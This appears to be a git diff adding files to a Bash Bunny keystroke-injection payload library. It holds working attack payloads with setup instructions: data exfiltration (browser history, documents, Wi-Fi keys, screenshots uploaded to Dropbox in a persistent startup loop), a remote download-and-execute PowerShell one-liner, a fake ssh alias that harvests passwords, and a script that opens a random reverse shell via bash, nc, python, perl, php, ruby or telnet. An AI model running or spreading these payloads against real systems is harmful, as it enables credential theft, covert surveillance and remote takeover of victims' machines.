<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>

16
payloads/library/exfiltration/History-Pig/payload.txt Normal file
View File

@ -0,0 +1,16 @@
REM Title: History-Pig
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate browsers history to a dropbox
REM Target: Windows 10, 11
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

45
payloads/library/exfiltration/Mac_Exfil/payload.txt Executable file
View File

@ -0,0 +1,45 @@
#!/bin/bash
# Title: Mac_Exfil
# Description: Exfiltrates files from logged in users Documents and Desktop folders
# Author: Carey Balboa - Mac Help Nashville, Inc. with assistance from corydon76 props to Nashville 2600
# Target: macOS
# Dependencies: none
#
# Format your MicroSD XC card for your Bash Bunny Mark II using FAT32 and name it "BUNNY" containing a folder named "loot"
LED SETUP
ATTACKMODE HID STORAGE VID_0x05AC PID_0x0267
QUACK GUI SPACE
QUACK DELAY 500
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 1000
LED STAGE1
QUACK STRING "rsync -av --max-size=5.0m --include='*.pdf' --include='*.docx' --include='*.xlsx' --exclude='*' ~/Documents/ ~/Desktop/ /Volumes/BUNNY/loot"
QUACK ENTER
QUACK DELAY 2000
# Sync filesystem
# By default, the Linux kernel writes data to disk asynchronously.
# Writes are buffered (cached) in memory, and written to the storage device at the optimal time.
# The sync command forces an immediate write of all cached data to disk.
# Run sync if you anticipate the system to be unstable, or the storage device to become suddenly unavailable,
# and you want to ensure all data is written to disk. (WE ARE ABOUT TO EJECT IT)
sync
QUACK DELAY 2000
LED STAGE2
QUACK STRING "diskutil eject BUNNY && killall Terminal"
QUACK ENTER
QUACK DELAY 1000
LED STAGE3
# LED payload complete
LED W FAST
mount /dev/mmcblk0p1 /mnt
files=$(find /mnt/loot -type f | wc -l)
# debug=$(find /mnt/loot -type f)
# DEBUG "switch-1-debug" "$files:$debug"
umount /mnt
if [ "$files" != "0" ]; then
LED FINISH
else
LED FAIL
fi

18
payloads/library/exfiltration/Mac_Exfil/readme.md Normal file
View File

@ -0,0 +1,18 @@
# Mac_Exfil for the BashBunny
* Author: Carey Balboa - Mac Help Nashville, Inc. with assistance from corydon76 props to Nashville 2600
* Version: Version 1.0
* Target: macOS
## Description
A payload that Exfiltrates Word, Excel & PDF files from logged in users Documents and Desktop folders
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Purple | Executing Payload |
| Green | Successfully grabbed files |
| Red | Did not get files |

17
payloads/library/exfiltration/OooohThatsHandy/Read-Me Normal file
View File

@ -0,0 +1,17 @@
OooohThatsHandy
Extract useful information such as nmap scan results, wifi keys, Local DNS Cache, User privilieges and group memberships, user folder contents with images and documents being transferred
Designed for and tested on Win 10
@PeteDavis91 - Follow me on Twitter!
v0.4
Exfiltration
Attackmodes - HID Storage RNDIS_ETHERNET
Credit to Hak5 & Darren for making amaizng content and products for years!
Thanks to 0iphori3 and Cribbit for answering my annoying questions all the time on the discord!
LED CODES:
SOLID BLUE LED: Setting Up
FAST BLUE LED: Creating Data
VERY FAST BLUE LED: Exporting Data Created and Discovered
SOLID WHITE LED: Cleaning up and finalizing
FINISH GREEN LED: Safe to remove your Bash Bunny - Enjoy the data

63
payloads/library/exfiltration/OooohThatsHandy/payload Normal file
View File

@ -0,0 +1,63 @@
REM Title: OooohThatsHandy
REM Description: Extract useful information such as nmap, wifi keys, DNS Cache, User privilieges and group memberships, user folder contents with images and documents, shared folders
REM OS: Designed for Win 10
REM Author: Twitter @PeteDavis91
REM Version: 0.6
REM Category: Exfiltration
REM Attackmodes: HID Storage RNDIS_ETHERNET
REM Credz: Hak5 Darren obviously, 0iphori3 and Cribbit
REM LED CODES:
REM SOLID BLUE LED: Setting Up
REM FAST BLUE LED: Creating Data
REM VERY FAST BLUE LED: Exporting Data Created and Discovered
REM SOLID WHITE LED: Cleaning up and finalizing
REM FINISH GREEN LED: Safe to remove your Bash Bunny - Enjoy the data
REM OPTIONS
REM This option is used for the transferring the user profile onto the BashBunny. Set in milliseconds, the longer you can wait the more data you will get.
NoTimeToHangAround=30000
REM This section sets up the BashBunny
LED B SOLID
Q DELAY 1000
DUCKY_LANG gb
ATTACKMODE HID STORAGE RNDIS_ETHERNET
Q DELAY 1000
GET TARGET_IP
Q DELAY 500
REM This section runs commands to create logs and data for export
LED B FAST
Q DELAY 500
mkdir /root/hostsideloot
Q DELAY 1000
nmap -sC -O -F $TARGET_IP >> /root/hostsideloot/nmap.txt
Q DELAY 1000
RUN WIN 'cmd /minimized /c mkdir %TEMP%\LOOK && netsh wlan show profile * key=clear > %TEMP%\LOOK\WiFi.txt & whoami /all > %TEMP%\LOOK\UserGroupsPrivs.txt'
Q DELAY 1000
RUN WIN 'cmd /minimized /c ipconfig /displaydns > %TEMP%\LOOK\DNSCache.txt & dsregcmd /status > %TEMP%\LOOK\AzureInfo.txt & net share > %TEMP%\LOOK\Shares.txt'
Q DELAY 1000
RUN WIN "powershell -W Hidden -c \$s = gwmi win32_service; echo \$s.pathname | Out-File -FilePath %TEMP%\\LOOK\\CheckForUnquoted.txt"
REM This section exports the previously created data as well as the running user profile with images and documents
LED B VERYFAST
Q DELAY 50
RUN WIN "powershell -W Hidden -c \$destination = ((gwmi win32_volume -f '\"label=''BashBunny'''\").Name); robocopy \$env:TEMP\\LOOK \$destination\\loot\\"
Q DELAY 1000
RUN WIN "powershell -W Hidden -c \$destination = ((gwmi win32_volume -f '\"label=''BashBunny'''\").Name); robocopy \$env:USERPROFILE \$destination\\loot\\ /E /W:1 /R:1 /NP /MT /XD \"\$env:APPDATA\" \"\$env:LOCALAPPDATA\" \"\$env:USERPROFILE\\AppData\""
Q DELAY $NoTimeToHangAround
REM Cleanup and finalizing
LED W SOLID
mv /root/hostsideloot/nmap.txt /root/udisk/loot/
RUN WIN 'cmd /c rmdir /s /q %TEMP%\LOOK'
rmdir /root/hostsideloot
ATTACKMODE FINISH
LED G FINISH

3
payloads/library/exfiltration/Screen-Shock/I.bat Normal file
View File

@ -0,0 +1,3 @@
@echo off
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause

117
payloads/library/exfiltration/Screen-Shock/README.md Normal file
View File

@ -0,0 +1,117 @@
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/screen.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Screen+Shock!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Screen-Shock
This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
## Description
This payload uses iwr to download 2 files
* I.bat
* c.ps1
**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup
**c.ps1** will sit in AppData\Roaming folder, taking a screenshot of all monitors every 15 seconds
Then the contents will then be sent to the DropBox for viewing pleasure
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Dropbox
* Windows 10
* [Here](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md) is a tutorial on how to use DropBox-Upload
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>

45
payloads/library/exfiltration/Screen-Shock/c.ps1 Normal file
View File

@ -0,0 +1,45 @@
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
while(1){
Add-Type -AssemblyName System.Windows.Forms,System.Drawing
$screens = [Windows.Forms.Screen]::AllScreens
$top = ($screens.Bounds.Top | Measure-Object -Minimum).Minimum
$left = ($screens.Bounds.Left | Measure-Object -Minimum).Minimum
$width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum
$height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum
$bounds = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height)
$bmp = New-Object -TypeName System.Drawing.Bitmap -ArgumentList ([int]$bounds.width), ([int]$bounds.height)
$graphics = [Drawing.Graphics]::FromImage($bmp)
$graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)
$bmp.Save("$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png")
$graphics.Dispose()
$bmp.Dispose()
start-sleep -Seconds 15
"$env:USERPROFILE\AppData\Local\Temp\$env:computername-Capture.png" | DropBox-Upload
}

17
payloads/library/exfiltration/Screen-Shock/payload.txt Normal file
View File

@ -0,0 +1,17 @@
REM Title: Screen-Shock
REM Author: atomiczsec
REM Description: This payload is meant to exfiltrate screenshots of all monitors and sends to a dropbox every 15 seconds. (This setting can be changed in the c.ps1 file)
REM Target: Windows 10
DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH

1
payloads/library/exfiltration/Screen-Shock/placeholder Normal file
View File

@ -0,0 +1 @@

4
payloads/library/exfiltration/simple-usb-extractor/x.cmd
View File

@ -33,5 +33,9 @@ xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.pdf %dst% >>nul
xcopy /C /Q /G /Y %USERPROFILE%\Downloads\*.docx %dst% >>nul
)
if Exist %USERPROFILE%\AppData\Local\Google\Chrome\ (
xcopy /C /Q /G /Y "%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\History" %dst% >>nul
)
@cls
@exit

103
payloads/library/general/Water-UnMark/README.md Normal file
View File

@ -0,0 +1,103 @@
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/watermark.png?raw=true" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Water-UnMark!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Water-UnMark
A payload to get rid of the ugly windows activation watermark.
## Description
This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!
## Getting Started
### Dependencies
* Unactivated Windows 10
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
```
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>

17
payloads/library/general/Water-UnMark/payload.txt Normal file
View File

@ -0,0 +1,17 @@
REM Title: Water-UnMark
REM Author: atomiczsec
REM Target OS: Windows 10
REM Description: This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!!
DELAY 2000
GUI r
DELAY 100
STRING powershell Start-Process powershell -verb runAs
DELAY 1000
ALT Y
DELAY 1000
STRING Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force
ENTER
DELAY 100
STRING Restart-Computer -Force
ENTER

1
payloads/library/general/Water-UnMark/placeholder Normal file
View File

@ -0,0 +1 @@

44
payloads/library/phishing/fake-ssh/README.md Normal file
View File

@ -0,0 +1,44 @@
# Fake SSH
- Title: Fake SSH
- Author: TW-D
- Version: 1.0
- Target: Linux
- Category: Phishing
## Description
1) Copies the "ssh" command spoofing program to the user's home directory.
2) Defines a new persistent "ssh" alias with the file "~/.bash_aliases".
3) When the user executes the command "ssh" in a terminal, the spoofing program :
- __By default__ retrieves the username@address and password and writes them to "/tmp/.ssh_password".
- __But__ this behavior can be changed in line 20 of the "ssh-phishing.sh" file.
## Configuration
From "payload.txt" change the values of the following constant :
```bash
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
```
From "ssh-phishing.sh" change the values of the following constants if necessary :
```bash
readonly MAXIMUM_ATTEMPTS=3
```
From "ssh-phishing.sh", change the payload if you wish :
```bash
##
# <YOUR-PAYLOAD>
##
/bin/echo "${1}:${ssh_password}" >> /tmp/.ssh_password
##
# </YOUR-PAYLOAD>
##
```

86
payloads/library/phishing/fake-ssh/payload.txt Normal file
View File

@ -0,0 +1,86 @@
#!/bin/bash
#
# Title: Fake-SSH
#
# Description:
# This program creates a fake "ssh"
# command by defining an persistent alias.
#
# Author: TW-D
# Version: 1.0
# Category: Phishing
# Target: Linux
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ===============
# Ubuntu 20.04.4 LTS x86_64 (Xfce) and OpenSSH_8.2p1
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Yellow quadruple blink .......................... STAGE4
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
######## SETUP ########
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
udisk mount
######## ATTACK ########
LED ATTACK
Q DELAY 7000
Q CTRL-ALT t
Q DELAY 7000
LED STAGE2
Q STRING " cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/"
Q ENTER
Q DELAY 1500
Q STRING " cp ./ssh-phishing.sh ~/.ssh_phishing.sh"
Q ENTER
Q DELAY 1500
LED STAGE3
Q STRING " chmod +x ~/.ssh_phishing.sh"
Q ENTER
Q DELAY 1500
Q STRING " printf \"\\nalias ssh='~/.ssh_phishing.sh'\\n\" >> ~/.bash_aliases"
Q ENTER
Q DELAY 1500
LED STAGE4
Q STRING " exit"
Q ENTER
Q DELAY 1500
######## CLEANUP ########
LED CLEANUP
sync
udisk unmount
######## FINISH ########
LED FINISH
shutdown -h 0

48
payloads/library/phishing/fake-ssh/ssh-phishing.sh Normal file
View File

@ -0,0 +1,48 @@
#!/bin/bash
#
# Fake-SSH
#
# This program imitates the behavior
# of the "ssh" command.
#
readonly MAXIMUM_ATTEMPTS=3
attempts() {
/bin/echo -n "${1}'s password: "
read -r -s ssh_password
/bin/echo ""
/bin/echo "echo \"${ssh_password}\"" > "${SSH_ASKPASS}"
if ( /bin/setsid --wait /usr/bin/ssh -o ConnectTimeout=5 -o StrictHostKeyChecking="no" -o UserKnownHostsFile="/dev/null" "${1}" "exit" > /dev/null 2>&1 ); then
##
# <YOUR-PAYLOAD>
##
/bin/echo "${1}:${ssh_password}" >> /tmp/.ssh_password
##
# </YOUR-PAYLOAD>
##
/bin/setsid --wait /usr/bin/ssh -o StrictHostKeyChecking="no" -o UserKnownHostsFile="/dev/null" $2 2> /dev/null
/bin/rm "${SSH_ASKPASS}"
exit 0
fi
/bin/echo "Permission denied, please try again."
}
if [ "${#}" -eq 0 ]; then
/usr/bin/ssh
else
for destination in "${@}"; do
if [[ "${destination}" =~ "@" ]]; then
export SSH_ASKPASS="/tmp/.askpass_script.sh"
/bin/echo "" > "${SSH_ASKPASS}"
chmod +x "${SSH_ASKPASS}"
for ((iterator=1; iterator <= MAXIMUM_ATTEMPTS; iterator++)); do
attempts "${destination}" "${*}"
done
/bin/echo "${destination}: Permission denied (publickey,password,keyboard-interactive)."
/bin/rm "${SSH_ASKPASS}"
exit 0
fi
done
/usr/bin/ssh "${@}"
fi

32
payloads/library/remote_access/linux_random-reverse-shell/README.md Normal file
View File

@ -0,0 +1,32 @@
# Random Reverse Shell
- Title: Random Reverse Shell
- Author: TW-D
- Version: 1.0
- Target: Linux
- Category: Remote Access
## Description
1) Checks the availability of binaries on the system.
2) Builds a list of possible payloads.
3) Performs one at random.
## Configuration
From "payload.txt" change the values of the following constant :
```bash
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
readonly REMOTE_HOST="127.0.0.1"
readonly REMOTE_PORT=54424
```
## Usage
```
hacker@hacker-computer:~$ nc -lnvvp <REMOTE_PORT>
```

85
payloads/library/remote_access/linux_random-reverse-shell/payload.txt Normal file
View File

@ -0,0 +1,85 @@
#!/bin/bash
#
# Title: Random Reverse Shell
#
# Description:
# 1) Checks the availability of binaries on the system.
# 2) Builds a list of possible payloads.
# 3) Performs one at random.
#
# Author: TW-D
# Version: 1.0
# Category: Remote Access
# Target: Linux
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ==========
# Ubuntu 20.04.4 LTS x86_64 (Xfce)
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Yellow quadruple blink .......................... STAGE4
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
readonly REMOTE_HOST="127.0.0.1"
readonly REMOTE_PORT=54424
######## SETUP ########
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
udisk mount
######## ATTACK ########
LED ATTACK
Q DELAY 7000
Q CTRL-ALT t
Q DELAY 5000
LED STAGE2
Q STRING " cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/"
Q ENTER
Q DELAY 1500
LED STAGE3
Q STRING " chmod +x ./random_reverse-shell.sh"
Q ENTER
Q DELAY 1500
Q STRING " \$BASH ./random_reverse-shell.sh ${REMOTE_HOST} ${REMOTE_PORT}"
Q ENTER
Q DELAY 3000
LED STAGE4
Q STRING " exit"
Q ENTER
Q DELAY 1000
######## CLEANUP ########
LED CLEANUP
sync
udisk unmount
######## FINISH ########
LED FINISH
shutdown -h 0

126
payloads/library/remote_access/linux_random-reverse-shell/random_reverse-shell.sh Normal file
View File

@ -0,0 +1,126 @@
#!/bin/bash
#
# Title: Random Reverse Shell
#
# Description:
# 1) Checks the availability of binaries on the system.
# 2) Builds a list of possible payloads.
# 3) Performs one at random.
#
# Author: TW-D
# Version: 1.0
# Category: Remote Access
# Target: Linux
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ==========
# Ubuntu 20.04.4 LTS x86_64 (Xfce)
#
# USAGE
# ==========
# hacker@hacker-computer:~$ nc -lnvvp <REMOTE_PORT>
# victim@victim-computer:~$ $BASH ./random_reverse-shell.sh <REMOTE_HOST> <REMOTE_PORT>
#
set -eo pipefail
readonly REMOTE_HOST="${1}"
readonly REMOTE_PORT="${2}"
readonly RANDOM_FILENAME="${RANDOM}"
readonly BINARIES_LIST=(
"/bin/bash"
"/bin/mkfifo"
"/bin/cat"
"/bin/nc"
"/bin/perl"
"/bin/php"
"/bin/python"
"/bin/ruby"
"/bin/sh"
"/bin/mknod"
"/bin/telnet"
)
readonly BASH_PAYLOAD=$(cat <<EOF
/bin/bash -i > /dev/tcp/${REMOTE_HOST}/${REMOTE_PORT} 0<&1 2>&1
EOF
)
#
# [CTRL + c]
#
readonly NC_PAYLOAD=$(cat <<EOF
/bin/mkfifo /tmp/${RANDOM_FILENAME} && /bin/cat /tmp/${RANDOM_FILENAME} | ${BASH} -i 2>&1 | /bin/nc ${REMOTE_HOST} ${REMOTE_PORT} > /tmp/${RANDOM_FILENAME}
EOF
)
#
# Tested on Perl v5.30.0
# [CTRL + c]
#
readonly PERL_PAYLOAD=$(cat <<EOF
/bin/perl -X -MIO -e '\$socket = new IO::Socket::INET(PeerAddr, "${REMOTE_HOST}:${REMOTE_PORT}"); STDIN->fdopen(\$socket, "r"); ($~)->fdopen(\$socket, "w"); system(\$_) while<>'
EOF
)
#
# Tested on PHP v7.4.3
#
readonly PHP_PAYLOAD=$(cat <<EOF
/bin/php -r '\$fsockopen = fsockopen("${REMOTE_HOST}", ${REMOTE_PORT}); exec("${BASH} -i <&3 >&3 2>&3");'
EOF
)
#
# Tested on Python v2.7.18
#
readonly PYTHON_PAYLOAD=$(cat <<EOF
/bin/python -c 'import socket, os, subprocess; tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM); tcp_socket.connect(("${REMOTE_HOST}", ${REMOTE_PORT})); os.dup2(tcp_socket.fileno(), 0); os.dup2(tcp_socket.fileno(), 1); os.dup2(tcp_socket.fileno(), 2); subprocess.call(["${BASH}", "-i"])'
EOF
)
#
# Tested on Ruby v2.7.0p0
#
readonly RUBY_PAYLOAD=$(cat <<EOF
/bin/ruby -rsocket -e 'tcp_socket = TCPSocket.new("${REMOTE_HOST}", ${REMOTE_PORT}); while (command = tcp_socket.gets); command = (command.chomp).downcase; (command == "exit") ? break : tcp_socket.puts(\`#{command}\`) rescue nil; end; tcp_socket.close'
EOF
)
readonly SH_PAYLOAD=$(cat <<EOF
/bin/sh -i > /dev/tcp/${REMOTE_HOST}/${REMOTE_PORT} 0<&1 2>&1
EOF
)
readonly TELNET_PAYLOAD=$(cat <<EOF
/bin/mknod /tmp/${RANDOM_FILENAME} p && /bin/telnet ${REMOTE_HOST} ${REMOTE_PORT} 0</tmp/${RANDOM_FILENAME} | ${BASH} 1>/tmp/${RANDOM_FILENAME}
EOF
)
set -u
available_binaries=()
for binary in "${BINARIES_LIST[@]}"; do
if command -v "${binary}" > /dev/null 2>&1; then
available_binaries+=("${binary}")
fi
done
available_payloads=()
[[ "${available_binaries[*]}" =~ "/bin/bash" ]] && available_payloads+=("${BASH_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/mkfifo" && "${available_binaries[*]}" =~ "/bin/cat" && "${available_binaries[*]}" =~ "/bin/nc" ]] && available_payloads+=("${NC_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/perl" ]] && available_payloads+=("${PERL_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/php" ]] && available_payloads+=("${PHP_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/python" ]] && available_payloads+=("${PYTHON_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/ruby" ]] && available_payloads+=("${RUBY_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/sh" ]] && available_payloads+=("${SH_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/mknod" && "${available_binaries[*]}" =~ "/bin/telnet" ]] && available_payloads+=("${TELNET_PAYLOAD}") || echo ""
random_payload=${available_payloads[$RANDOM % "${#available_payloads[@]}"]}
$BASH -c "${random_payload}" &